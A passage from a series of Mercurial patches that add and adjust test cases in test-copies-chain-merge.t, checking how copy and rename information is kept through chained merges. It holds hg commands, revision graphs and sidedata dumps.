side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -833,6 +921,8 @@ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way mJ,EAm: chained merges (conflict -> simple) - same content everywhere mK,AEm: chained merges (conflict -> simple) - same content everywhere + mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) Test that sidedata computations during upgrades are correct @@ -1101,6 +1191,27 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 43 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' + added : unrelated-l, ; + ##### revision 44 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 45 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 46 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 47 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -1999,3 +2110,61 @@ a (known-bad-output upgraded !) +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. + +reference output: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' + M b + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' + M b + A d + a (filelog !) + a (sidedata !) + a (upgraded !) 
+ R a + +chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607965016 -3600 # Mon Dec 14 17:56:56 2020 +0100 # Node ID 075b2499e3d65e4526bc13e2e0403a981e6c0b11 # Parent 3805b13ad7fe3d5f437ad5bd0cf139554a249821 test-copies: add test chaining multiple merge Right now, the copy tracing logic takes the right decision for merges, but it does not keep track of the right information about these decisions and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9611 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -865,7 +865,100 @@ +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. 
+ + $ case_desc="chained merges (copy-overwrite -> simple) - same content" + +(extra unrelated changes) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo n > unrelated-n + $ hg add unrelated-n + $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)' + created new head + + $ hg up 'desc("g-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo o > unrelated-o + $ hg add unrelated-o + $ hg ci -m 'o-1: unrelated changes (based on "g" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mFGm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("o-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mFG,Om: $case_desc" + +(merge variant 2) + + $ hg up 'desc("o-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("FGm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
+ (branch merge, don't forget to commit) + $ hg ci -m "mO,FGm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mGFm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mGF,Nm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mGFm")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mN,GFm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' + @ 53 mN,GFm: chained merges (copy-overwrite -> simple) - same content + |\ + +---o 52 mGF,Nm: chained merges (copy-overwrite -> simple) - same content + | |/ + | | o 51 mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | |\ + | | +---o 50 mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | | |/ + | | | o 49 o-1: unrelated changes (based on "g" changes) + | | | | + | o | | 48 n-1: unrelated changes (based on the "f" series of changes) + | | | | + o-----+ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + |/ / / + | o / 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + |/|/ + | o 25 g-1: update d + | | + o | 22 f-2: rename i -> d + | | + o | 21 f-1: rename h -> i + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + Summary of all created cases ---------------------------- @@ -914,15 +1007,21 @@ mEA,Jm: chained merges (conflict -> simple) - same content everywhere mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: 
unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + mFG,Om: chained merges (copy-overwrite -> simple) - same content mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + mGF,Nm: chained merges (copy-overwrite -> simple) - same content mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way mJ,EAm: chained merges (conflict -> simple) - same content everywhere mK,AEm: chained merges (conflict -> simple) - same content everywhere mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mN,GFm: chained merges (copy-overwrite -> simple) - same content + mO,FGm: chained merges (copy-overwrite -> simple) - same content + n-1: unrelated changes (based on the "f" series of changes) + o-1: unrelated changes (based on "g" changes) Test that sidedata computations during upgrades are correct @@ -1212,6 +1311,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 48 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' + added : unrelated-n, ; + ##### revision 49 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' + added : unrelated-o, ; + ##### revision 50 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 51 ##### + 1 sidedata entries + entry-0014 size 4 + 
'\x00\x00\x00\x00' + ##### revision 52 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 53 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -2168,3 +2293,52 @@ A unrelated-l R a +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + +reference output: + + (for details about the filelog pick, check the mFGm/mGFm case) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + +Chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + h (known-bad-output sidedata !) + h (known-bad-output upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + h (known-bad-output sidedata !) + h (known-bad-output upgraded !) 
# HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613592525 -3600 # Wed Feb 17 21:08:45 2021 +0100 # Node ID 74e2256a56b8a57f3aa556d0601b0e47dd41570d # Parent 075b2499e3d65e4526bc13e2e0403a981e6c0b11 test-copies: remove revision number from log Differential Revision: https://phab.mercurial-scm.org/D10048 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -18,7 +18,7 @@ > [diff] > git=yes > [command-templates] - > log={rev} {desc}\n + > log={desc}\n > EOF #if compatibility @@ -71,11 +71,11 @@ $ hg mv c d $ hg ci -Am 'i-2: c -move-> d' $ hg log -G - @ 2 i-2: c -move-> d + @ i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h And having another branch with renames on the other side @@ -85,15 +85,15 @@ $ hg mv e f $ hg ci -Am 'a-2: e -move-> f' $ hg log -G --rev '::.' - @ 4 a-2: e -move-> f + @ a-2: e -move-> f | - o 3 a-1: d -move-> e + o a-1: d -move-> e | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Have a branching with nothing on one side @@ -104,13 +104,13 @@ $ hg ci -m 'b-1: b update' created new head $ hg log -G --rev '::.' - @ 5 b-1: b update + @ b-1: b update | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Create a branch that delete a file previous renamed @@ -121,13 +121,13 @@ $ hg ci -m 'c-1 delete d' created new head $ hg log -G --rev '::.' 
- @ 6 c-1 delete d + @ c-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Create a branch that delete a file previous renamed and recreate it @@ -141,15 +141,15 @@ $ hg add d $ hg ci -m 'd-2 re-add d' $ hg log -G --rev '::.' - @ 8 d-2 re-add d + @ d-2 re-add d | - o 7 d-1 delete d + o d-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Having another branch renaming a different file to the same filename as another @@ -162,15 +162,15 @@ $ hg mv g f $ hg ci -m 'e-2 g -move-> f' $ hg log -G --rev '::.' - @ 10 e-2 g -move-> f + @ e-2 g -move-> f | - o 9 e-1 b -move-> g + o e-1 b -move-> g | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Setup all merge @@ -201,21 +201,21 @@ $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -249,23 +249,23 @@ $ hg add d $ hg ci -m 'mCBm-1 re-add d' $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - @ 16 mCBm-1 re-add d + @ mCBm-1 re-add d | - o 15 mCBm-0 simple 
merge - C side: delete a file with copies history , B side: unrelated update - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Comparing with a merge re-adding the file afterward @@ -291,21 +291,21 @@ $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -337,23 +337,23 @@ $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + @ 
mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: existing copy information overwritten on one branch @@ -394,21 +394,21 @@ $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + @ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -446,21 +446,21 @@ $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + @ 
mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: merging a change to a file with a "copy overwrite" to that file from another branch @@ -501,21 +501,21 @@ $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -561,19 +561,19 @@ created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 merge updated/deleted - revive the file (updated 
content) - one way + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -610,19 +610,19 @@ created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -659,19 +659,19 @@ $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename 
(same content as the other branch) - one way + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | i-2: c -move-> d | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Decision from previous merge are properly chained with later merge @@ -750,35 +750,35 @@ $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' - @ 42 mJ,EAm: chained merges (conflict -> simple) - same content everywhere + @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere |\ - +---o 41 mEA,Jm: chained merges (conflict -> simple) - same content everywhere + +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere | |/ - | | o 40 mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere | | |\ - | | +---o 39 mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere | | | |/ - | | | o 38 k-1: unrelated changes (based on "e" changes) + | | | o k-1: unrelated changes (based on "e" changes) | | | | - | o | | 37 j-1: unrelated changes (based on the "a" series of changes) + | o | | j-1: unrelated changes (based on the "a" series of changes) | | | | - o-----+ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |/ / / - | o / 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content 
for f) - one way + | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way |/|/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: chaining salvage information during a merge @@ -839,29 +839,29 @@ created new head $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' - @ 47 mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) |\ - | | o 46 mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) | |/| - +-+---o 45 mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) | | | - | +---o 44 mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) | | |/ - | o | 43 l-1: unrelated changes (based on "c" changes) + | o | l-1: unrelated changes (based on "c" changes) | | | - | | o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way | |/| - o---+ 32 mCB-revert-m-0 merge explicitely revive deleted file - 
B side: unrelated change, C side: delete d (restored by merge) - one way + o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way |/ / - o | 6 c-1 delete d + o | c-1 delete d | | - | o 5 b-1: b update + | o b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -931,33 +931,33 @@ created new head $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' - @ 53 mN,GFm: chained merges (copy-overwrite -> simple) - same content + @ mN,GFm: chained merges (copy-overwrite -> simple) - same content |\ - +---o 52 mGF,Nm: chained merges (copy-overwrite -> simple) - same content + +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content | |/ - | | o 51 mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content | | |\ - | | +---o 50 mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content | | | |/ - | | | o 49 o-1: unrelated changes (based on "g" changes) + | | | o o-1: unrelated changes (based on "g" changes) | | | | - | o | | 48 n-1: unrelated changes (based on the "f" series of changes) + | o | | n-1: unrelated changes (based on the "f" series of changes) | | | | - o-----+ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |/ / / - | o / 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + | o / mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |/|/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: 
rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Summary of all created cases @@ -1364,21 +1364,21 @@ - unrelated change on the other side $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -1423,23 +1423,23 @@ and recreate an unrelated file after the merge $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - o 16 mCBm-1 re-add d + o mCBm-1 re-add d | - o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: 
a b h + o i-0 initial commit: a b h - comparing from the merge @@ -1499,21 +1499,21 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -1553,12 +1553,12 @@ Log output should not include a merge commit as it did not happen $ hg log -Gfr 'desc("mBDm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg log -Gfr 'desc("mDBm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ @@ -1582,23 +1582,23 @@ - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 merge with copies info on both side - A side: rename d to 